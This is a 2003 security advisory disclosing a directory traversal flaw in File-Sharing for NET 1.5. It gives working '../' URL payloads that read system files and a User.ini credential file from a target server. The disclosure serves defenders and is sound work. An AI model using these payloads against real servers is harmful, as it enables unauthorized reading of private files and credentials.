Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendors Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@xxxxxxxxxxx
http://www.bsecurity.tk